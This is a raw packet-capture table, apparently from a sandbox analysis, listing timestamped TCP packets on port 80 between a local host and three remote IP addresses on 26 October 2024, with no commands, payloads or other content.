Oct 26, 2024 07:27:18.122214079 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.122226000 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.122232914 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.122279882 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.122287035 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.122317076 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.122380018 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.122553110 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.122560024 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.122571945 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.122616053 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.122848034 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.122867107 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.122894049 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.122916937 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.163492918 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.163500071 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.163511992 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.163599968 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.163639069 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.163676023 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.163733959 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.163758993 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.163764954 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.163805008 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.163952112 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.163992882 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.164041042 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.164083958 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.164129019 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.164160967 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.164247990 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.164293051 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.164304972 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.164336920 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.164366961 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.164374113 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.164375067 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.164416075 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.192478895 CEST	80	49984	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:18.192493916 CEST	80	49984	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:18.192500114 CEST	80	49984	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:18.192503929 CEST	80	49984	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:18.192517996 CEST	80	49984	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:18.192524910 CEST	80	49984	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:18.192537069 CEST	80	49984	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:18.192543983 CEST	80	49984	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:18.192553997 CEST	80	49984	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:18.192588091 CEST	80	49984	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:18.192625999 CEST	49984	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:18.192625999 CEST	49984	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:18.192652941 CEST	49984	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:18.198000908 CEST	80	49984	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:18.198008060 CEST	80	49984	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:18.198020935 CEST	80	49984	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:18.198025942 CEST	80	49984	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:18.198096037 CEST	49984	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:18.204335928 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.204343081 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.204355001 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.204410076 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.218353033 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.218367100 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.218431950 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.218478918 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.218486071 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.218492031 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.218497992 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.218528032 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.218552113 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.239661932 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.239716053 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.239757061 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.239775896 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.239798069 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.239799976 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.239815950 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.239834070 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.239854097 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.240197897 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.240246058 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.240256071 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.240257025 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.240262985 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.240293980 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.280935049 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.280976057 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.280982971 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.281028986 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.281034946 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.281035900 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.281066895 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.281094074 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.281095028 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.281141996 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.281512022 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.281526089 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.281575918 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.281578064 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.281811953 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.281816959 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.281872988 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.281949997 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.281994104 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.282007933 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.282015085 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.282032967 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.282058954 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.282082081 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.282458067 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.282473087 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.282484055 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.282525063 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.322015047 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.322043896 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.322055101 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.322194099 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.336051941 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.336133003 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.336138010 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.336143017 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.336148977 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.336154938 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.336205006 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.336242914 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.343367100 CEST	80	49984	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:18.343436003 CEST	49984	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:18.357290983 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.357326031 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.357328892 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.357408047 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.357450962 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.357456923 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.357464075 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.357498884 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.357523918 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.357768059 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.357774973 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.357786894 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.357820988 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.398575068 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.398581982 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.398592949 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.398704052 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.398711920 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.398729086 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.398740053 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.398776054 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.399070024 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.399075985 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.399087906 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.399118900 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.399385929 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.399393082 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.399409056 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.399432898 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.399482012 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.399666071 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.399705887 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.399745941 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.399856091 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.399861097 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.399873018 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.399878979 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.399902105 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.399926901 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.439723969 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.439732075 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.439743996 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.439824104 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.453850031 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.453856945 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.453864098 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.453929901 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.453958988 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.453965902 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.454005957 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.474925041 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.474931955 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.474944115 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.475006104 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.475013018 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.475054026 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.475157022 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.475246906 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.475294113 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.475305080 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.475351095 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.475419998 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.475426912 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.475472927 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.516283989 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.516299009 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.516305923 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.516339064 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.516370058 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.516387939 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.516400099 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.516407013 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.516413927 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.516431093 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.516446114 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.516705036 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.516807079 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.516813040 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.516814947 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.516825914 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.516855001 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.516884089 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.517060041 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.517066956 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.517075062 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.517105103 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.517122030 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.517370939 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.517378092 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.517389059 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.517419100 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.517445087 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.517452002 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.517541885 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.557466984 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.557472944 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.557480097 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.557531118 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.571639061 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.571671009 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.571681976 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.571734905 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.571749926 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.571757078 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.571798086 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.592185020 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.592216015 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.592236996 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.592242956 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.592250109 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.592253923 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.592309952 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.592344999 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.592351913 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.592359066 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.592365026 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.592370033 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.592410088 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.592410088 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.592578888 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.592611074 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.592617035 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.592643023 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.592673063 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.592680931 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.592685938 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.592725039 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.592766047 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.592809916 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.592819929 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.592832088 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.592849016 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.592859983 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.592888117 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.593194008 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.593271017 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.593286037 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.593307018 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.597594976 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.597637892 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.597662926 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.597708941 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.597754955 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.597843885 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.633861065 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.633903980 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.633918047 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.633923054 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.633930922 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.633940935 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.633961916 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.633969069 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.634006023 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.634156942 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.634202957 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.634213924 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.634215117 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.634222984 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.634227991 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.634243011 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.634265900 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.634747982 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.634783983 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.634788990 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.634816885 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.635018110 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.635073900 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.635080099 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.635092020 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.635094881 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.635118961 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.635152102 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.635452032 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.635488987 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.635514975 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.635548115 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.674880981 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.674887896 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.674900055 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.674961090 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.689037085 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.689058065 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.689106941 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.689116001 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.689152956 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.689171076 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.689178944 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.689184904 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.689213037 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.689237118 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.710100889 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.710143089 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.710146904 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.710158110 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.710197926 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.710222960 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.710347891 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.710355043 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.710366964 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.710372925 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.710403919 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.710428953 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.710675001 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.710711002 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.710731030 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.710743904 CEST	49982	80	192.168.2.7	185.215.113.84
